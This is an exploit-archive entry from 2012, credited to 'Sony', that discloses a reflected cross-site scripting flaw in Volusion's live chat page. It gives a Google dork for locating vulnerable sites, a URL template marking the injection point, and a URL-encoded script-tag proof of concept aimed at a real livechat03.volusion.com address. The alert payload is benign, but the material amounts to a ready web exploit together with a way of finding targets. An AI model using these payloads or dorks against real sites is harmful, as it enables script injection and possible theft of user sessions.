# Exploit Title:  Volusion Chat Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://www.volusion.com/
# Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered
by volusion
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/03/volusion-chat-cross-site-scripting.html
..................................................................


https://livechat03.volusion.com/livechat.aspx?ID=24342[our xss is
here]&location=http%3A//www.volusion.com/&auto=0&cookieGuid=

https://livechat03.volusion.com/livechat.aspx?ID=24342%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&location=http%3A//www.volusion.com/&auto=0&cookieGuid=

http://4.bp.blogspot.com/-CSpnn8fNIYY/T2EGeu_u41I/AAAAAAAAAvM/TcpwDTdCLUA/s1600/volusion.JPG

..................................................................

InSecurity.Ro

Because we care, we're security aware!